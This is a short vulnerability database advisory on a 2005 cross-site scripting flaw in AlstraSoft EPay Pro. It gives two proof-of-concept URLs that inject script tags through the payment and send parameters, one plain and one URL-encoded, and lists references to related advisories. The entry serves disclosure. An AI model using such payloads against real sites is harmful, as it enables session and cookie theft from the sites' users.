AlstraSoft EPay Pro order_num Multiple Variable XSS

2005-04-01T07:54:57
ID OSVDB:15228
Type osvdb
Reporter OSVDB
Modified 2005-04-01T07:54:57

Description

Manual Testing Notes

http://[victim]/epal/?order_num=crap&payment="><script>alert(document.cookie)</script>&send=first&send=regular&send=priority&send=express

http://[victim]/epal/?order_num=crap&payment=crap&send=first&send=regular&send=priority&send='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

References:

Vendor URL: http://www.alstrasoft.com/
Security Tracker: 1013627
Secunia Advisory ID: 14802
Related OSVDB ID: 15227
Other Advisory URL: http://digitalparadox.org/advisories/aep.txt
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-04/0022.html